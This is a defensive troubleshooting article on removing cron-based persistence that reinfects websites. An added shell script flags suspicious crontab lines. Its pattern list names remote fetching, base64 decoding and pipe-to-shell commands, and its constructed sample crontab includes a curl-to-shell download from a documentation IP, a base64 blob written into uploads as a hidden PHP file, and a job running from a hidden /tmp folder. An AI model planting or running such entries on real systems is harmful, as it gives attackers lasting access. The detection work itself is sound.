Introduction

A site that looks clean for a few minutes and then gets infected again often still has a persistence mechanism. Cron is a common one: an attacker plants a scheduled task that downloads malware, rewrites a backdoor, or restores a malicious file after you delete it. The fix is to identify the scheduled job, remove it safely, and clean the payload it keeps reintroducing.

Symptoms

  • Malicious files reappear after deletion or cleanup
  • Redirects, spam pages, or backdoors return at regular intervals
  • Security scans look clean briefly, then detect the same compromise again
  • Unfamiliar scripts run from temporary folders, uploads, or hidden paths
  • The server was recently cleaned, but suspicious outbound requests continue

Common Causes

  • A malicious cron entry downloads or restores a backdoor on a schedule
  • The attacker added persistence under the site user, root, or a control panel account
  • A cleanup removed visible malware files but missed the task that recreates them
  • Compromised scripts are stored in multiple locations and one scheduled job rebuilds the others
  • A hostile command is hidden inside a legitimate-looking maintenance job

Step-by-Step Fix

  1. Isolate the site if necessary so reinfection does not keep affecting visitors while you investigate persistence.
  2. Review scheduled tasks for the site user, system-wide cron locations, and hosting control panel jobs to find unfamiliar commands or scripts.
  3. Trace every suspicious cron command to the file or remote source it executes rather than deleting entries without understanding what they restore.
  4. Preserve copies of malicious commands and payload paths for incident analysis, then remove the cron persistence from the affected accounts.
  5. Delete or quarantine the scripts, web shells, or downloaded files that the cron job was recreating.
  6. Rotate credentials and review how the attacker obtained write access, because cron persistence is often only one part of the compromise.
  7. Scan the rest of the site and server for adjacent persistence methods such as startup scripts, plugin backdoors, rogue admin users, or modified scheduled tasks in the application.
  8. Monitor file changes, outbound requests, and scheduled task lists after cleanup to confirm the reinfection pattern has stopped.
  9. Finish with patching, credential hygiene, and access hardening so the same attacker cannot simply recreate the cron job again.
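The following shell script is an added example for steps 2 to 4, not part of the original article: it lists the standard Linux cron locations present on a host and runs a crontab listing through a pattern filter that flags entries worth tracing before removal. The pattern list, the sample crontab and every path, address and file name in it are constructed for illustration (198.51.100.23 is a documentation address and the base64 blob decodes to "echo hello"); hosting-panel crontabs are not covered by the path list.

```shell
#!/bin/sh
# Added triage helper for steps 2 to 4 above. Not from the original article;
# the pattern list and sample crontab below are constructed for illustration.

# Commands that commonly appear in cron persistence entries: fetching a remote
# script and piping it to a shell, decoding an embedded payload, or running
# from world-writable directories. Treat a hit as "look closer", not proof.
SUSPICIOUS_PATTERNS='curl |wget |base64 -d|base64 --decode|/tmp/|/var/tmp/|/dev/shm/|[|][[:space:]]*(sh|bash)|python[0-9.]* -c|perl -e'

# list_cron_sources: print the standard Linux cron locations present on this
# host (step 2). Hosting panels keep extra per-account crontabs elsewhere.
list_cron_sources() {
    for p in /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily \
             /etc/cron.weekly /etc/cron.monthly \
             /var/spool/cron /var/spool/cron/crontabs; do
        [ -e "$p" ] && echo "$p"
    done
    return 0
}

# flag_cron_lines: read crontab text on stdin; print each non-comment line
# whose command matches SUSPICIOUS_PATTERNS, prefixed with its line number so
# the entry can be traced and preserved before it is removed (steps 3 and 4).
flag_cron_lines() {
    grep -n '^' \
      | grep -E -v '^[0-9]+:[[:space:]]*(#|$)' \
      | grep -E -i "$SUSPICIOUS_PATTERNS"
}

# count_flagged: number of flagged lines in the crontab text on stdin.
# Always exits 0, so it is safe to call under `set -e`.
count_flagged() {
    flag_cron_lines | wc -l | tr -d ' '
}

# Constructed sample crontab for a site user: two routine jobs plus three
# entries of the kind the article describes. 198.51.100.23 is a documentation
# address and the base64 blob decodes to "echo hello".
SAMPLE_CRONTAB='# constructed sample, not taken from a real host
SHELL=/bin/sh
PATH=/usr/local/bin:/usr/bin:/bin
# routine site maintenance
0 3 * * * /usr/bin/php /var/www/site/artisan schedule:run >> /var/log/site-cron.log 2>&1
15 4 * * 0 /usr/bin/find /var/www/site/storage/tmp -type f -mtime +7 -delete
# fetches a remote script and pipes it straight to a shell
*/5 * * * * curl -s http://198.51.100.23/x.txt | sh
# rebuilds a file in the uploads directory from an embedded blob
*/10 * * * * echo ZWNobyBoZWxsbw== | base64 -d > /var/www/site/uploads/.cache.php
# runs a script kept in a hidden directory under /tmp
@hourly /bin/sh /tmp/.X11/update.sh'

echo "cron locations on this host:"
list_cron_sources
echo "flagged entries in the sample crontab:"
printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
```

On a live host, feed real listings into the filter instead of the sample, for example `crontab -l -u siteuser | flag_cron_lines` and `cat /etc/cron.d/* | flag_cron_lines`, and keep the flagged output as part of the evidence from step 4. A pattern list is only a triage aid: a hostile command tucked into an otherwise ordinary maintenance job (the last of the common causes above) will not necessarily match, so every entry in an unfamiliar crontab still deserves the manual trace described in step 3.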